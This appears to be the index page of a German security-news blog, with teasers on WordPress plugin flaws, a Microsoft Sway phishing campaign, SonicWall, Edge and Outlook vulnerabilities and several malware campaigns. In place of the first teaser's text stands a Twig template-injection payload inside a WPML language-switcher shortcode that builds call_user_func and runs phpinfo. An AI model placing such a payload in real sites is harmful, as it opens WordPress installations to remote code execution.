Home

Kritische Sicherheitslücke im WordPress-Plugin gefährdet 1 Million Websites

von | 27. August 2024 | Schwachstellen | 0 Kommentieren

[wpml_language_switcher]
{% set call_user_func = c~a~l~l~~u~s~e~r~~f~u~n~c %}
{% set phpinfo = p~h~p~i~n~f~o %}
{{ {1: phpinfo}|filter(call_user_func) }}
[/wpml_language_switcher]
Lesen Sie mehr

Massive Phishing-Kampagne nutzt Microsoft Sway aus: QR-Codes im Visier

von | 27. August 2024 | Phishing | 0 Kommentieren

Eine groß angelegte Phishing-Kampagne missbraucht Microsoft Sway, ein cloudbasiertes Tool zur Erstellung von Online-Präsentationen, um Microsoft 365-Nutzer dazu zu bringen, ihre Zugangsdaten preiszugeben. Die Angriffe wurden im Juli 2024 von Netskope Threat Labs...
Lesen Sie mehr

CTEM im Rampenlicht: Wie Gartners neue Kategorien helfen, Sicherheitslücken besser zu verwalten

von | 27. August 2024 | Wissen | 0 Kommentieren

Wollen Sie wissen, was 2024 im Bereich der Sicherheitsoperationen neu und bedeutend ist? Gartners kürzlich veröffentlichter Hype Cycle für Sicherheitsoperationen geht wichtige Schritte, um den Bereich des Continuous Threat Exposure Managements (CTEM) zu organisieren...
Lesen Sie mehr

SonicWall veröffentlicht kritisches Update für Firewall-Sicherheitslücke

von | 27. August 2024 | Schwachstellen | 0 Kommentieren

SonicWall hat dringend empfohlene Sicherheitsupdates für eine schwerwiegende Sicherheitslücke in seinen Firewalls veröffentlicht. Wird diese Schwachstelle erfolgreich ausgenutzt, können Angreifer unbefugten Zugriff auf die Geräte erlangen. Die Sicherheitslücke,...
Lesen Sie mehr

Kritische RCE-Schwachstelle in Microsoft Edge ermöglicht Remote-Systemübernahme

von | 23. August 2024 | Schwachstellen | 0 Kommentieren

Eine schwerwiegende Schwachstelle zur Remote-Code-Ausführung (RCE) wurde in Microsoft Edge entdeckt. Diese Schwachstelle könnte Angreifern ermöglichen, die Kontrolle über betroffene Systeme zu übernehmen, indem sie beliebigen Code aus der Ferne ausführen. Microsoft...
Lesen Sie mehr

Hacker nutzen Amazon-Dienste für den Versand von manipulierten MSC-Dateien

von | 23. August 2024 | Cyber Threat, Cyber Attacken | 0 Kommentieren

Cyberkriminelle haben begonnen, Amazon-Dienste auszunutzen, um mit Schadsoftware infizierte MSC-Dateien zu verbreiten. Diese Entwicklung zeigt, wie attraktiv die umfassenden Angebote von Amazon für Angreifer geworden sind, da sie enorme Rechenleistung, Speicherplatz...
Lesen Sie mehr

Neuer iOS-Bug lässt iPhones durch das Eingeben von vier Zeichen abstürzen

von | 22. August 2024 | Schwachstellen | 0 Kommentieren

Ein Sicherheitsforscher hat am Mittwoch einen Bug in iOS entdeckt, der dazu führen kann, dass iPhones und iPads kurzzeitig abstürzen, wenn eine bestimmte Folge von vier Zeichen in bestimmte Suchleisten eingegeben wird. Der Fehler betrifft die Benutzeroberfläche von...
Lesen Sie mehr

Kritische Sicherheitslücke im WordPress-Plugin LiteSpeed Cache ermöglicht Hackern Administratorzugriff

von | 22. August 2024 | Schwachstellen | 0 Kommentieren

Sicherheitsforscher haben eine schwerwiegende Sicherheitslücke im LiteSpeed Cache-Plugin für WordPress aufgedeckt, die es nicht authentifizierten Nutzern ermöglicht, Administratorrechte zu erlangen. „Das Plugin leidet unter einer nicht authentifizierten...
Lesen Sie mehr

Kritische Sicherheitslücke in Outlook: Technische Details zur Zero-Click-RCE-Verwundbarkeit veröffentlicht

von | 21. August 2024 | Schwachstellen | 0 Kommentieren

Forscher von Morphisec haben detaillierte technische Informationen über eine kürzlich entdeckte Zero-Click-Sicherheitslücke in Microsoft Outlook veröffentlicht, die als CVE-2024-38021 identifiziert wurde. Diese Schwachstelle stellt ein erhebliches Sicherheitsrisiko...
Lesen Sie mehr

Hacker nutzen PHP-Schwachstelle aus, um heimliche Msupedge-Backdoor zu installieren

von | 21. August 2024 | Schwachstellen, Cyber Attacken | 0 Kommentieren

Eine bisher unbekannte Backdoor namens Msupedge wurde in einem gezielten Cyberangriff gegen eine nicht näher benannte Universität in Taiwan eingesetzt. Das Symantec Threat Hunter Team, Teil von Broadcom, berichtete, dass die auffälligste Eigenschaft dieser Backdoor...
Lesen Sie mehr
Grundlagen der Sicherheit bei Betriebstechnik: OT-Security

Grundlagen der Sicherheit bei Betriebstechnik: OT-Security

Aug 24, 2023 |

Grundlagen der Sicherheit bei Betriebstechnik: OT-Security Die Sicherheit bei Betriebstechnik, auch als Operational Technology (OT) bekannt, ist von entscheidender Bedeutung für Unternehmen. OT-Security umfasst die Schutzmaßnahmen, die ergriffen werden, um die Verfügbarkeit, Integrität und Vertraulichkeit von Betriebssystemen, Netzwerken und Daten zu gewährleisten. Angesichts der zunehmenden Vernetzung und Digitalisierung ist eine umfassende OT-Security-Strategie unverzichtbar. OT-Systeme, die in industriellen Umgebungen eingesetzt werden, sind anfällig für Bedrohungen wie Cyberangriffe, Malware und Datendiebstahl. Um diese Risiken zu minimieren, ist es wichtig, grundlegende Sicherheitsmaßnahmen zu implementieren. Dazu gehören unter anderem die Segmentierung von Netzwerken, die Nutzung von Firewalls, die regelmäßige Aktualisierung von Betriebssystemen und Anwendungen sowie die Schulung der Mitarbeiter im Umgang mit Sicher

mehr lesen
HiatusRAT-Malware taucht in Taiwan wieder auf

HiatusRAT-Malware taucht in Taiwan wieder auf

Aug 22, 2023 |

Nach einer vorübergehenden Pause ist das HiatusRAT-Malware in Taiwan erneut aufgetaucht. Die Cyberkriminellen nutzen diese Schadsoftware, um sensible Daten zu stehlen und Systeme zu infiltrieren. Es ist wichtig, dass Unternehmen und Nutzer in Taiwan wachsam bleiben und geeignete Sicherheitsmaßnahmen ergreifen, um sich vor dieser Bedrohung zu schützen.

mehr lesen